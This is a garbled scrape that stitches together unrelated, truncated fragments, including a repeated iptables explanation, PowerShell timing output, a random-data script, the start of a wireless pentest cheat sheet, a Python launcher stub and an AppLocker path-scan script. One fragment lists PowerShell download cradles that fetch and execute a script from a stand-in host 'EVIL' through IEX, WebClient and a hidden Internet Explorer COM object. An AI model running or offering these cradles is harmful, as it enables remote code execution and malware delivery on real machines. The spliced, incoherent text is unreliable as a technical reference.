1) Filter Table
Filter is default table for iptables. So, if you don’t define you own table, you’ll be using filter table. Iptables’s filter table has the following built-in chains.
| PS> time { ping -n 1 google.com } -Samples 10 -Silent | |
| .......... | |
| Avg: 62.1674ms | |
| Min: 56.9945ms | |
| Max: 87.9602ms | |
| PS> time { ping -n 1 google.com } -Samples 10 -Silent -Long | |
| .......... | |
| Avg: 00:00:00.0612480 | |
| Min: 00:00:00.0572167 |
| $megs=1000;$w=New-Object IO.streamWriter $env:temp\data.dat;[char[]]$c='azertyuiopqsdfghjklmwxcvbnAZERTYUIOPQSDFGHJKLMWXCVBN0123456789-_';1..$megs|ForEach-Object{1..4|ForEach-Object{$r=$c|Get-Random -Count $c.Count;$s=-join $r;$w.Write($s*4kb);}}; |
1) Filter Table
Filter is default table for iptables. So, if you don’t define you own table, you’ll be using filter table. Iptables’s filter table has the following built-in chains.
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
| # Load | |
| Split-Path $MyInvocation.MyCommand.Path -Parent | Push-Location | |
| Get-ChildItem poco_*.ps1 | %{. $_} | |
| Pop-Location | |
| function Select-Poco | |
| { | |
| Param | |
| ( | |
| [Object[]]$Property = $null, |
#Wireless Penetration Testing Cheat Sheet
##WIRELESS ANTENNA
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
| from ctypes import * | |
| import win32event | |
| import win32process | |
| import win32api | |
| import win32ui | |
| import sys | |
| import os.path | |
| def panic(proc, reason): | |
| win32ui.MessageBox(reason, 'Launcher Error!', 0) |
| # Paths that we've already excluded via AppLocker. | |
| $exclusions = @() | |
| # Paths to process. | |
| $paths = @( | |
| "C:\Windows" | |
| ) | |
| # Setup log. | |
| $log = "$PSScriptRoot\UserWritableLocations.log" |